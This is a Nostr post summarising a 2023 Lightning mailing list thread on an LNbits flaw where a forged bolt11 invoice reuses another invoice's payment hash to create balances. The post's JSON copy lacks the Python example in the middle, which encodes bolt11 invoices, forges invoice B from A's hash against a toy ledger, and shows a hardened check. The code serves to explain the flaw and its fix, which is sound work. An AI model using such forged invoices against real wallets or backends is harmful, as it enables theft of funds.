Conversation Details on Nostr
📝 Summary: LNbits found an exploit that lets attackers create balances by manipulating invoices. The attacker takes the payment hash from one payment and embeds it in a crafted invoice, which tricks the backend into treating the crafted invoice as the original payment. Developers can prevent this with additional checks that the presented invoice matches the one the backend issued. A patch has been released.
👥 Authors:
• Antoine Riard ( Antoine Riard [ARCHIVE] (npub1vjz…x8dd) )
• callebtc ( callebtc [ARCHIVE] (npub1wlh…90xk) )
📅 Messages Date: 2023-06-19
✉️ Message Count: 2
📚 Total Characters in Messages: 6791
Message Summaries
✉️ Message by callebtc on 19/06/2023:
LNbits discovered an exploit that allows attackers to create balances out of thin air by abusing a quirk in how invoices are handled internally. The attacker can insert a bolt-11 payment hash of payment A into a different payment, creating a malicious invoice B that can trick the backend into believing that B == A. The mitigation is simple, and developers should use additional checks to ensure that the invoice details have not been messed around with. The attack requires a fundamental understanding of bolt-11 and custom tooling to produce the malicious invoice.
✉️ Message by Antoine Riard on 19/06/2023:
LNbits discovered an exploit allowing attackers to create balances by abusing a quirk in how invoices are handled internally, which may affect other Lightning applications. A patch has been released.
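As an added example that is not part of the thread above (it is neither LNbits code nor either author's tooling): the attack callebtc's message describes, worked through end to end. A minimal bech32/bolt11 encoder and decoder produces invoice A, the attacker's tooling lifts A's payment hash into a second invoice B carrying a different amount, and a toy custodial ledger settles B two ways. The ledger, the wallet names, the exact way the vulnerable path mixes fields from A and B, and the zero-filled signature slot are all assumptions made for illustration; the hardened path shows the kind of additional check the message recommends, matching the presented invoice against the record the backend itself issued rather than trusting its fields.

```python
"""Toy model of the invoice confusion described above (added example, not LNbits code)."""
import hashlib
import os
import time

CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
_GEN = [0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3]
_MULT_MSAT = {"": 10**11, "m": 10**8, "u": 10**5, "n": 100}  # hrp multipliers ('p' omitted)

def _polymod(hrp, data):  # BIP173 checksum polynomial over the expanded hrp + 5-bit data
    chk = 1
    for v in [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp] + data:
        top, chk = chk >> 25, ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= _GEN[i]
    return chk

def _groups(n, count):  # big-endian split of integer n into `count` five-bit groups
    return [(n >> 5 * (count - 1 - i)) & 31 for i in range(count)]

def _int(groups):  # inverse of _groups
    return int("".join(f"{g:05b}" for g in groups) or "0", 2)

def bech32_decode(s):
    s = s.lower()  # no BIP173 90-char cap here: bolt11 strings are longer
    pos = s.rfind("1")  # '1' is not in CHARSET, so the last one is the separator
    if pos < 1 or len(s) - pos < 7 or any(c not in CHARSET for c in s[pos + 1:]):
        raise ValueError("malformed bech32")
    hrp, data = s[:pos], [CHARSET.index(c) for c in s[pos + 1:]]
    if _polymod(hrp, data) != 1:
        raise ValueError("bad checksum")
    return hrp, data[:-6]

def encode_invoice(amount_msat, payment_hash, timestamp):
    """bolt11 layout: amount in the hrp, 35-bit timestamp, tagged 'p' field, 104-group signature."""
    if amount_msat % 100:
        raise ValueError("toy encoder only emits the 'n' multiplier (1 nBTC = 100 msat)")
    hrp = f"lnbc{amount_msat // 100}n"
    data = _groups(timestamp, 7)
    # tag 1 == 'p', 10-bit length 52, 32-byte hash left-aligned in 52 groups (4 zero pad bits)
    data += [1, 52 >> 5, 52 & 31] + _groups(int.from_bytes(payment_hash, "big") << 4, 52)
    data += [0] * 104  # ASSUMPTION: zeroed slot where the payee's secp256k1 signature belongs
    data += _groups(_polymod(hrp, data + [0] * 6) ^ 1, 6)  # bech32 checksum
    return hrp + "1" + "".join(CHARSET[d] for d in data)

def decode_invoice(bolt11):
    hrp, data = bech32_decode(bolt11)
    if not hrp.startswith("lnbc") or len(data) < 7 + 104:
        raise ValueError("not a mainnet invoice")
    digits, unit = (hrp[4:-1], hrp[-1]) if hrp[-1] in "mun" else (hrp[4:], "")
    amount_msat = int(digits) * _MULT_MSAT[unit] if digits.isdigit() else None  # None: no amount
    fields, payment_hash, pos = data[7:-104], None, 0  # trailing 104 groups: unchecked signature
    while pos + 3 <= len(fields):
        tag, length = fields[pos], (fields[pos + 1] << 5) | fields[pos + 2]
        payload = fields[pos + 3:pos + 3 + length]
        if tag == 1 and length == len(payload) == 52 and (_int(payload) & 0xF) == 0:
            payment_hash = (_int(payload) >> 4).to_bytes(32, "big")
        pos += 3 + length
    if payment_hash is None:
        raise ValueError("missing or malformed payment hash")
    return {"amount_msat": amount_msat, "timestamp": _int(data[:7]), "payment_hash": payment_hash}

class Ledger:
    """Toy custodial backend: one invoice table shared by all wallets, keyed by payment hash."""
    def __init__(self, balances):
        self.balances, self.invoices = dict(balances), {}

    def create_invoice(self, wallet, amount_msat):
        payment_hash = hashlib.sha256(os.urandom(32)).digest()  # preimage not needed in this toy
        bolt11 = encode_invoice(amount_msat, payment_hash, int(time.time()))
        self.invoices[payment_hash] = {"wallet": wallet, "amount_msat": amount_msat, "bolt11": bolt11}
        return bolt11

    def pay_internal(self, payer, bolt11, hardened):
        presented = decode_invoice(bolt11)
        record = self.invoices.get(presented["payment_hash"])
        if record is None or presented["amount_msat"] is None:
            raise ValueError("unknown or amountless invoice")
        # Hardened: the hash only locates the record; the whole string must be what we issued
        if hardened and bolt11.lower() != record["bolt11"]:  # pins amount, timestamp, signature
            raise ValueError("presented invoice differs from the one this backend issued")
        # Vulnerable: hash match makes B look like A: debit what B says, credit what A says (toy model)
        if self.balances.get(payer, 0) < presented["amount_msat"]:
            raise ValueError("insufficient funds")
        self.balances[payer] -= presented["amount_msat"]
        self.balances[record["wallet"]] = self.balances.get(record["wallet"], 0) + record["amount_msat"]

def run_attack(hardened):
    """Attacker controls wallet_a and wallet_b; only wallet_b holds real funds (1 sat = 1000 msat)."""
    ledger = Ledger({"wallet_a": 0, "wallet_b": 1_000})
    honest = ledger.create_invoice("wallet_a", 1_000_000_000)  # invoice A: 1,000,000 sat
    # Custom tooling: lift A's payment hash into a fresh 1-sat invoice B (constructed input).
    forged = encode_invoice(1_000, decode_invoice(honest)["payment_hash"], int(time.time()))
    try:
        ledger.pay_internal("wallet_b", forged, hardened)
        return {"balances": ledger.balances, "error": None}
    except ValueError as exc:
        return {"balances": ledger.balances, "error": str(exc)}
```

run_attack(hardened=False) leaves wallet_a holding 1,000,000 sat that nobody deposited while wallet_b loses only its 1 sat; run_attack(hardened=True) rejects the forged invoice and leaves both balances untouched. The toy never verifies the bolt11 signature (there is no secp256k1 dependency), so a production check should additionally confirm that the signature recovers the payee key the backend expects, on top of matching the presented invoice against the issued record.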
Follow Lightning Mailing List (npub1j3t…4gll) for full threads
Published at 2023-06-20 11:15:34
Event JSON
{
"id": "c10991f40a065e07ba2c8ebc816d67255bc2349568023672210a477548677146",
"pubkey": "57fe4c4ae74215fb92bd0dcb8a7787c5e907db74e987f30f1acaaad9c3a0271f",
"created_at": 1687259734,
"kind": 30023,
"tags": [
[
"d",
"5c152f85-028a-4571-85dc-3a0d078bb9a8"
],
[
"title",
"Conversation Details"
],
[
"image",
"https://nostr.build/i/dbc5bd7993c8d036431edeefea63a2b3b796e1f49baf96bf6b09e13c8c662833.jpg"
],
[
"p",
"6485bc56963b51c9043d0855cca9f78fcbd0ce135a195c3f969e18ca54a0d551"
],
[
"p",
"77eeb5bdaa4549cf07ee002a39b9236f4ede78df640eca7b11571eecf46f61d6"
],
[
"p",
"9456f7acb763eaab2e02bd8e60cf17df74f352c2ae579dce1f1dd25c95dd611c"
]
],
"content": "📝 Summary: LNbits found an exploit that lets attackers create balances by manipulating invoices. The attacker can use a payment hash from one payment to create a malicious invoice that tricks the system into thinking it's a different payment. Developers can prevent this by using additional checks. A patch has been released.\n\n👥 Authors: \n• Antoine Riard ( nostr:npub1vjzmc45k8dgujppapp2ue20h3l9apnsntgv4c0ukncvv549q64gsz4x8dd )\n• callebtc ( nostr:npub1wlhtt0d2g4yu7plwqq4rnwfrda8du7xlvs8v57c32u0wear0v8tq6h90xk )\n\n📅 Messages Date: 2023-06-19\n\n✉️ Message Count: 2\n\n📚 Total Characters in Messages: 6791\n\n## Messages Summaries\n\n✉️ Message by callebtc on 19/06/2023:\nLNbits discovered an exploit that allows attackers to create balances out of thin air by abusing a quirk in how invoices are handled internally. The attacker can insert a bolt-11 payment hash of payment A into a different payment, creating a malicious invoice B that can trick the backend into believing that B == A. The mitigation is simple, and developers should use additional checks to ensure that the invoice details have not been messed around with. The attack requires a fundamental understanding of bolt-11 and custom tooling to produce the malicious invoice.\n\n✉️ Message by Antoine Riard on 19/06/2023:\nLNbits discovered an exploit allowing attackers to create balances by abusing a quirk in how invoices are handled internally, which may affect other Lightning applications. A patch has been released.\n\n\nFollow nostr:npub1j3t00t9hv042ktszhk8xpnchma60x5kz4etemnslrhf9e9wavywqf94gll for full threads",
"sig": "dfd03621289a0b9c0d698c716ec0cdf23b9be51be3d5c5b53aab3e6076eff44afbae75b1faf53178dfb2b267fe3b270ed30545a925472e930013b3a12f9c1f79"
}